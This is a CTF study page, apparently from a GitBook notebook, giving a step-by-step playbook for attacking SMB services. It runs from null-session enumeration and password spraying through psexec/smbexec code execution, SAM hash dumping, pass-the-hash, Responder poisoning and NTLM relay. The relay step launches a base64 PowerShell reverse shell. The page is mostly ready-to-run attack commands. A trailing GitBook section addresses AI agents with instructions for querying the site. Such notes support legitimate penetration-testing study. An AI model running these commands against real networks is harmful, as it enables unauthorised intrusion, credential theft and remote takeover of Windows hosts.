> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/service-exploitation/smb-139-445.md).

# SMB (139, 445)

## Attacking SMB

### Overview

* **Port 139** — SMB over NetBIOS (TCP/IP)
* **Port 445** — SMB direct over TCP (Windows 2000+)
* **Samba** — Linux/Unix SMB implementation
* **MSRPC** — uses SMB named pipes as transport layer

***

### Enumeration

```bash
sudo nmap -sV -sC -p139,445 <IP>
```

From scan: SMB version, hostname, OS, signing status (signing disabled = relay attack possible)

***

### Null Session (No Creds)

```bash
# List shares
smbclient -N -L //<IP>

# Shares + permissions
smbmap -H <IP>

# Recursive browse
smbmap -H <IP> -r <sharename>

# Download / Upload
smbmap -H <IP> --download "notes\note.txt"
smbmap -H <IP> --upload test.txt "notes\test.txt"

# RPC null session
rpcclient -U'%' <IP>
rpcclient $> enumdomusers

# Full auto enum
./enum4linux-ng.py <IP> -A -C
```

**enum4linux-ng gets:** workgroup, users, OS info, groups, shares, password policy

***

### Password Spraying

```bash
crackmapexec smb <IP> -u userlist.txt -p 'Password' --local-auth
```

* `--continue-on-success` — don't stop at first hit
* `--local-auth` — non-domain machine
* Wait 30–60 min between spray rounds to avoid lockout

***

### RCE (with creds)

```bash
# impacket-psexec → deploys service to ADMIN$, needs writable share
impacket-psexec administrator:'Password123!'@<IP>

# impacket-smbexec → spins local SMB server, no writable share needed
impacket-smbexec administrator:'Password123!'@<IP>

# CME → CMD or PS across multiple hosts
crackmapexec smb <IP> -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
# -x = CMD | -X = PowerShell
# default exec method is atexec; specify smbexec if it fails
```

***

### Post-Exploitation (Windows)

```bash
# Enumerate logged-on users across subnet
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

# Dump SAM hashes
crackmapexec smb <IP> -u administrator -p 'Password123!' --sam
```

**SAM hashes → crack or use for PtH**

***

### Pass-the-Hash (PtH)

```bash
crackmapexec smb <IP> -u Administrator -H <NTHASH>
impacket-psexec administrator@<IP> -hashes :<NTHASH>
```

No plaintext needed — NTLM hash is enough to authenticate.

***

### Forced Auth — Responder

```bash
sudo responder -I <interface>
```

**How it works:**

1. Victim can't resolve hostname → sends LLMNR/NBT-NS multicast
2. Responder poisons the response → victim connects to our fake SMB server
3. NTLMv2 hash captured

**Crack it:**

```bash
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
```

> NTLMv2 hashes are salted per session → same password gives different hashes each time

***

### NTLM Relay (if cracking fails)

**Requirement:** SMB signing disabled on target

```bash
# Step 1 — disable SMB in Responder so it doesn't respond (we're relaying, not capturing)
# /etc/responder/Responder.conf → SMB = Off

# Step 2 — relay to target, auto-dumps SAM
impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET_IP>

# Step 3 — relay + execute reverse shell
impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET_IP> -c 'powershell -e <b64>'
```

Generate PS reverse shell at [revshells.com](https://www.revshells.com) → PowerShell #3 (Base64)

***

### Attack Flow Summary

```
Null session?
  YES → smbmap/enum4linux → browse shares, get files, RPC enum
  NO  → spray creds with CME

Got creds?
  → psexec/smbexec for RCE
  → --sam for hashes
  → --loggedon-users for lateral movement targets

Got hash, can't crack?
  → Check signing disabled → relay with ntlmrelayx

On network, no creds?
  → Responder → capture NTLMv2 → crack or relay
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/service-exploitation/smb-139-445.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
